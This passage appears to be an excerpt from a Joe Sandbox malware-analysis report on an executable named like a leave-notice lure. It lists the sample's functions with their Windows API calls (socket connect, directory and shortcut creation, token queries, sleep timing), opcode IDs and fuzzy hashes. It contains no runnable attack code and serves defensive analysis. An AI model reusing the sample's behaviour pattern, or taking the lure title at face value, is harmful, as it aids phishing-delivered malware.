                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00FC60C3), ref: 00FC6388
                                                      • _wcsrchr.LIBCMT ref: 00FC63AA
                                                        • Part of subcall function 00FC6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00FC60C3), ref: 00FC63E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                      • String ID:
                                                      • API String ID: 3633006590-0
                                                      • Opcode ID: b142760efa4e6a0ff53d262982d5059b02d7ba3155990d169ef78d6cd0ce2a6f
                                                      • Instruction ID: 38eb0feb96bef4dbb355d30eb3a1e2fde178e4671e8df40a975e144d84e04387
                                                      • Opcode Fuzzy Hash: b142760efa4e6a0ff53d262982d5059b02d7ba3155990d169ef78d6cd0ce2a6f
                                                      • Instruction Fuzzy Hash: 6B21F6319082565AEB25AAB8AD43FEA336CAF15370F10006DF045C72C1EA65D984BB65
                                                      Function 00FD8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FDA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00FDA84E
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FD8BD3
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD8BE2
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00FD8BFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 3701255441-0
                                                      • Opcode ID: 80abcee454445ff953f89359beccdd1b1fc1f750d90f31ac7f969f0c42673e9c
                                                      • Instruction ID: 98c8b8e6e5698518a0c9bf127a7231b808614ca58b100f5410161d630de9ec9d
                                                      • Opcode Fuzzy Hash: 80abcee454445ff953f89359beccdd1b1fc1f750d90f31ac7f969f0c42673e9c
                                                      • Instruction Fuzzy Hash: B22181326001149FDB11AFA8CD45F7E77A9EF48760F084459F95697381DB78E8029761
                                                      Function 00FD8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00FD8441
                                                      • GetForegroundWindow.USER32 ref: 00FD8458
                                                      • GetDC.USER32(00000000), ref: 00FD8494
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00FD84A0
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00FD84DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: 6fcd64e1182245f6a4685be4319a317e03823fd2ca8b07f7dccb82df16b3e463
                                                      • Instruction ID: 7fd3b59df222622d3f77bd108ef4938feeb45abe3d40719af8ca133197cf9940
                                                      • Opcode Fuzzy Hash: 6fcd64e1182245f6a4685be4319a317e03823fd2ca8b07f7dccb82df16b3e463
                                                      • Instruction Fuzzy Hash: 0321A135A00204AFD710EFA4CD85AAEBBE5EF48341F088879E85997341DB74AC01DB60
                                                      Function 00F9AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F9AFE3
                                                      • SelectObject.GDI32(?,00000000), ref: 00F9AFF2
                                                      • BeginPath.GDI32(?), ref: 00F9B009
                                                      • SelectObject.GDI32(?,00000000), ref: 00F9B033
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: f93952be23cd1d353aba8e18f782c89c1d9638d602cbc625ddc9c5e1161b1bd7
                                                      • Instruction ID: 63c1a7df3eae5e6d831720b828e675371d508646ad048790751b08fa26e7c087
                                                      • Opcode Fuzzy Hash: f93952be23cd1d353aba8e18f782c89c1d9638d602cbc625ddc9c5e1161b1bd7
                                                      • Instruction Fuzzy Hash: 3521D8B8800305EFEF31DF94FA887993B68B714365F144315F56452094D37A98C1DF90
                                                      Function 00FA217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __calloc_crt.LIBCMT ref: 00FA21A9
                                                      • CreateThread.KERNEL32(?,?,00FA22DF,00000000,?,?), ref: 00FA21ED
                                                      • GetLastError.KERNEL32 ref: 00FA21F7
                                                      • _free.LIBCMT ref: 00FA2200
                                                      • __dosmaperr.LIBCMT ref: 00FA220B
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                      • String ID:
                                                      • API String ID: 2664167353-0
                                                      • Opcode ID: ebbd52f09724f0edea4c23fd88795f5f663b04cfbe4f9a4f1dc65eee3d4760f5
                                                      • Instruction ID: 92c49f27074eaa2593d50bd742ecd686661dff5766ec3af52333c5420cd604d8
                                                      • Opcode Fuzzy Hash: ebbd52f09724f0edea4c23fd88795f5f663b04cfbe4f9a4f1dc65eee3d4760f5
                                                      • Instruction Fuzzy Hash: 7811C4B3604306AFAB21BFA9DC41EAB3B98EF47770B100429F914C6191EB75D811A7B0
                                                      Function 00FBABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FBABD7
                                                      • GetLastError.KERNEL32(?,00FBA69F,?,?,?), ref: 00FBABE1
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00FBA69F,?,?,?), ref: 00FBABF0
                                                      • HeapAlloc.KERNEL32(00000000,?,00FBA69F,?,?,?), ref: 00FBABF7
                                                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00FBAC0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: 5fc88ec8efddafd94c538051834912705d149c9209c74bd0c8fffc3d20a648e3
                                                      • Instruction ID: 3c405c862fbce4ffdd610390a25cf75498526881aa6fca6a86f3bc5a3d836f1f
                                                      • Opcode Fuzzy Hash: 5fc88ec8efddafd94c538051834912705d149c9209c74bd0c8fffc3d20a648e3
                                                      • Instruction Fuzzy Hash: 3701E8B1600204BFDB224FE69C589AB7AADEB89765B104429F545C2250DA76DC40DF70
                                                      Function 00FB9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CLSIDFromProgID.OLE32 ref: 00FB9ADC
                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00FB9AF7
                                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 00FB9B05
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00FB9B15
                                                      • CLSIDFromString.OLE32(?,?), ref: 00FB9B21
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: 5b579aecb44b47e1654471f94f5a834f316572d59302d8f8296765b7ad348210
                                                      • Instruction ID: 5627011a33a9a0da5b9bb70a3fc69c2e8d76de40c9cae98becafc4b8787f9913
                                                      • Opcode Fuzzy Hash: 5b579aecb44b47e1654471f94f5a834f316572d59302d8f8296765b7ad348210
                                                      • Instruction Fuzzy Hash: D901847A600218BFDB115F95DC44B997BEDEF84351F148024FA49D2100D7B5DE41ABB0
                                                      Function 00FC7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7A74
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00FC7A82
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7A8A
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00FC7A94
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7AD0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: 486019df0011b42d58ef0874684a578dc43eee20217a7e38f102afeb5f8507cc
                                                      • Instruction ID: a021af98aaec97fdbda6c22aa430ef083c6561caa6b38aa33b3fa6dc6177aa76
                                                      • Opcode Fuzzy Hash: 486019df0011b42d58ef0874684a578dc43eee20217a7e38f102afeb5f8507cc
                                                      • Instruction Fuzzy Hash: 3A018C32C0871EEBCF14AFE5D94AAEDBB78FF1C711F000449E542B2264DB3996509BA1
                                                      Function 00FBAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FBAADA
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FBAAE4
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FBAAF3
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FBAAFA
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FBAB10
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: e781e696f8179d46886ac2cedcbdb749acbccadbd48a3699cf2d909335b96579
                                                      • Instruction ID: 7924d73ec5ae02cf5c3304b91c1d1aea9c97c5a556373d77f19135cfc18d0f44
                                                      • Opcode Fuzzy Hash: e781e696f8179d46886ac2cedcbdb749acbccadbd48a3699cf2d909335b96579
                                                      • Instruction Fuzzy Hash: E8F03C756102086FEB224FE5EC88EA73B6DFF85768F004029F995C7180CA6598419F71
                                                      Function 00FBAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FBAA79
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FBAA83
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FBAA92
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FBAA99
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FBAAAF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: 43c2d28e5b68461e923d899b1108f5fe5ffa1839c831125d864ee7bf2973bf3d
                                                      • Instruction ID: 717ed7d5016cc6cbd5a6807ff026f1ecb9c60898d66b6a8e6efe4bee5b29cc49
                                                      • Opcode Fuzzy Hash: 43c2d28e5b68461e923d899b1108f5fe5ffa1839c831125d864ee7bf2973bf3d
                                                      • Instruction Fuzzy Hash: 04F03C75600204AFEB225FE5AC89EAB3BACFB49764F404419F985C6180DA699C41DB71
                                                      Function 00FBEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FBEC94
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FBECAB
                                                      • MessageBeep.USER32(00000000), ref: 00FBECC3
                                                      • KillTimer.USER32(?,0000040A), ref: 00FBECDF
                                                      • EndDialog.USER32(?,00000001), ref: 00FBECF9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 81fcd9bb6692123e74a66546d43bd4dce90c1404af271e20b611d06e70bc7882
                                                      • Instruction ID: f6ef2cec11bc0ba56e37a906d0009299f0f499ff7855395b802ca99c70ffe73f
                                                      • Opcode Fuzzy Hash: 81fcd9bb6692123e74a66546d43bd4dce90c1404af271e20b611d06e70bc7882
                                                      • Instruction Fuzzy Hash: 0F018170900704ABEB355B91DE4EBD67BB8FB00B05F000569B582A14D4DBF9AA88DF90
                                                      Function 00F9B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 00F9B0BA
                                                      • StrokeAndFillPath.GDI32(?,?,00FFE680,00000000,?,?,?), ref: 00F9B0D6
                                                      • SelectObject.GDI32(?,00000000), ref: 00F9B0E9
                                                      • DeleteObject.GDI32 ref: 00F9B0FC
                                                      • StrokePath.GDI32(?), ref: 00F9B117
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: c9166dd470a36905033b19f85cda496f82a31a7a720803cd883161b3b177497f
                                                      • Instruction ID: 10f8f161b0e5aad443874111a3681846237e5706418bde835d9cb99dd21ecec1
                                                      • Opcode Fuzzy Hash: c9166dd470a36905033b19f85cda496f82a31a7a720803cd883161b3b177497f
                                                      • Instruction Fuzzy Hash: D6F019B8000304EFDB329FA5FA4C7943F65A705362F088314F4A9440E8C73A99D5DF60
                                                      Function 00FCF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00FCF2DA
                                                      • CoCreateInstance.OLE32(0100DA7C,00000000,00000001,0100D8EC,?), ref: 00FCF2F2
                                                      • CoUninitialize.OLE32 ref: 00FCF555
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize
                                                      • String ID: .lnk
                                                      • API String ID: 948891078-24824748
                                                      • Opcode ID: b6e8dd980a7d72ac00af4453caf457b4c85b05419cd198050c29fc1dedd2f8e3
                                                      • Instruction ID: 65eb28def5e410bd69867637c9e53409dbb408af1af7a5d81857f7630124820f
                                                      • Opcode Fuzzy Hash: b6e8dd980a7d72ac00af4453caf457b4c85b05419cd198050c29fc1dedd2f8e3
                                                      • Instruction Fuzzy Hash: AEA12C71504201AFD700EFA4CC82EABB7ECEF98714F00491DF55597192DB74EA49DBA2
                                                      Function 00FCE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F8660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F853B1,?,?,00F861FF,?,00000000,00000001,00000000), ref: 00F8662F
                                                      • CoInitialize.OLE32(00000000), ref: 00FCE85D
                                                      • CoCreateInstance.OLE32(0100DA7C,00000000,00000001,0100D8EC,?), ref: 00FCE876
                                                      • CoUninitialize.OLE32 ref: 00FCE893
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                      • String ID: .lnk
                                                      • API String ID: 2126378814-24824748
                                                      • Opcode ID: 17ca7de90b7b2667194618f26028cb667aa4910d4e58d5e28526d7aba0bb35f5
                                                      • Instruction ID: 33b48beadbaea038a32e4abdb1be4a9036ef0bdeac7f9c2f86699bfba3e9574f
                                                      • Opcode Fuzzy Hash: 17ca7de90b7b2667194618f26028cb667aa4910d4e58d5e28526d7aba0bb35f5
                                                      • Instruction Fuzzy Hash: A9A156356043029FCB10EF14C985E6ABBE5BF89720F04894CF99A9B3A1CB35ED45DB91
                                                      Function 00FA325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00FA32ED
                                                        • Part of subcall function 00FAE0D0: __87except.LIBCMT ref: 00FAE10B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      • Opcode ID: 7a4a5e7c6d4e5fb3693cc5c5db08daed4b98a8bb6b28e99bc466aca8cb672659
                                                      • Instruction ID: 5d51ea1dda2646bc6b9a79c81915c002554d77b5fd95e6a0c6bdb4c907d135b3
                                                      • Opcode Fuzzy Hash: 7a4a5e7c6d4e5fb3693cc5c5db08daed4b98a8bb6b28e99bc466aca8cb672659
                                                      • Instruction Fuzzy Hash: 275106F2E0C20196CB257A18C94137A7BD8DB43770F348D68F4D582299EE3D8D94BB56
